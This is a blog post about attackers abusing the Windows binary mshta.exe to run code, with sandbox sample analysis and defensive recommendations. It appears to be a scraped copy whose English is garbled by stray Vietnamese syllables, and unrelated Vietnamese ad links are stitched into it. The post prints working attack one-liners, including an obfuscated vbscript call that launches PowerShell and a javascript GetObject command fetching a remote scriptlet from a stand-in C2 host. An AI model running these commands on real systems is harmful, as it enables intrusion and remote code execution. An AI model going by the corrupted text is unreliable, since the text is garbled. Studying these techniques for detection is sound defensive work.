The not-so Usual Suspects

There is a growing trkết thúc for attackers to lớn more heavily utilize tools that already exist on a system rather than relying totally on their own custom malware.

Bạn đang xem: Mshta

Using .hta files or its partner in crime, mshta.exe, is an alternative sầu khổng lồ using macro enabled document for attacks và has been around a long time. It is a tool so flexible it even has its own cell on the MITRE ATT&CK matrix.

What Makes Mshta Dangerous?

To start, it is a signed, native sầu Microsoft binary that already exists on Windows that can exexinh đẹp code in a variety of ways, và in today’s living off the land culture that attackers love, this makes it a prime application of interest since code execution can be proxied through it.

Mshta.exe can also be used lớn bypass application whitelisting defenses and browser security settings.

These types of binaries have sầu been colloquially dubbed “LOLBINs” but more formally have sầu been turned into techniques within the Mitre tactic of Execution. Techniques T1218 và T1216: Signed binary proxy execution & Signed Script Proxy Execution, respectively.<1>

How It Is Used:

The most interesting abuse of native Windows binaries is the ability to lớn run a program that will either exedễ thương passed in code, or that will exedễ thương a payload hosted remotely. This was quite popular with Casey Smith’s squibblydoo and squiblytwo attacks where regsvr32 và wmic (also considered LOLBINs) were both found to be signed windows binaries able khổng lồ execute code hosted remotely.

Example 1: A remote file being executed:

mshta.exe cộ http<:>//

Example 2: Mshta used khổng lồ exeđáng yêu inline JScript/Vbscript.

Note: this syntax only works in cmd but will give sầu an error if executed in PowerShell.

mshta vbscript:(CreateObject(“WS”+”C”+”rI”+”Pt.ShEll”)).Run(“powershell”,1,True)(window.close)

Example 3: Calling a public method named Exec in a com scriptlet with JavaScript:

mshta javascript:a=GetObject(“script:http://c2<.>com/cmd.sct”).Exec()

source :

Note: notice the similarities between the usage of mshta with the exec method và the corresponding use in regsvr32 in the above sầu gist.

Alternatively, a file with a .hta extension can just as easily be double clicked on by the user where the code is set to lớn autorun on open much like a macro enabled document.

Availability in Public Tools

There is no shortage of easily accessible repos to help someone quickly generate a payload lớn use mshta. .hta tệp tin type generation is available in nearly all public red-teaming tools such as Empire, Metasploit, Unicorn, & Koadic.

Xem thêm: Cách Hủy Dịch Vụ 5055 Của Viettel Từ Tổng Đài 5055, Cách Kiểm Tra Và Hủy Các Dịch Vụ Trừ Tiền Viettel

Do not forget, however, that mshta’s use is not limited lớn .hta files. It can also Call code registered inside of com scriptlets (.sct) so it is relevant to lớn other tools such as GreatSCT.

It’s also worth noting that even if you have sầu powershell.exe pháo blocked, tools like nps payload have .hta files that dynamically build a project & compile it with msbuild (another tool to be weary of) lớn create a tool that can exedễ thương powershell commands without using powershell.exe at all.

In The Wild:

One of my favorite tools to lớn look for examples is tiện í It is an interactive online sandbox và is a great resource for finding new samples. You can even filter by MITRE ATT&CK Technique which is what I did here:


As you can see, there is no shortage of samples to go through. Another interesting detail is we can see several different tệp tin extensions used outside of the standard .hta and even some where the sandbox has found there are no threats detected. Is that true though?


Here we can see it has a dubious name of windows-update.hta running from a temp thư mục. This looks khổng lồ be a binary embedded within an .hta tệp tin khổng lồ trichồng automated sandbox detection.

Here we look at another sample with no threats detected.


sha256: 0ab797e7546eaf7bf40971a1f5f979355ed77a16124ae749ef1e90b81e4a3f88

We see multiple file extensions used in the name to lớn try và fool over users into thinking it is a picture. The script appears khổng lồ be using WMI lớn spawn a new process which breaks the “expected” process chain of mshta > PowerShell & can allow malware khổng lồ bypass rules that look for a direct process relationship such as Word > PowerShell.

We can also see the sandbox believes this is not malicious based on its scoring. Luckily, we can look at the PowerShell code that it spawns & get a better idea.


Process tree for 0ab797e7546eaf7bf40971a1f5f979355ed77a16124ae749ef1e90b81e4a3f88

So, mshta can also be used khổng lồ execute vbscript & WXiaoMi MI to lớn break the process tree chain & launch PowerShell.

And in the below example you can see mshta’s role in continuing part of an infection chain in comtháng malware.


Use of exploit then using mshta to exexinh tươi remote code spawning the rest of the infection chain

Protection và Recommendations

One of the easiest things you can implement is to lớn change the default applications for files with an .hta extension from mshta.exe to a plain text editor such as notepad to lớn help keep users from unwittingly double clicking a malicious .hta attachment

If you are a customer, Endpoint Security (ENS) provides rules 322, which is now enabled by default, và 324 that can be enabled in ePO khổng lồ help protect your environment against malicious mshta abuse.<2>

You should also spover some time exploring where abusable native sầu binaries lượt thích mshta.exe pháo are used in your environment. If there are no business needs that require it, blocking it outright is advised. If it is required, understvà where and why so you can find the systems running things lượt thích mshta.exe pháo that aren’t expected lớn be.

Xem thêm: Sách: Làm Chủ Môn Hóa Trong 30 Ngày Tập 2 Hóa Vô Cơ, Sách: Làm Chủ Môn Hóa Trong 30 Ngày Tập 2

For more insights and tips lượt thích these subscribe to lớn this blog or check out the lathử nghiệm threats from our Threat Center.

Chuyên mục: Blogs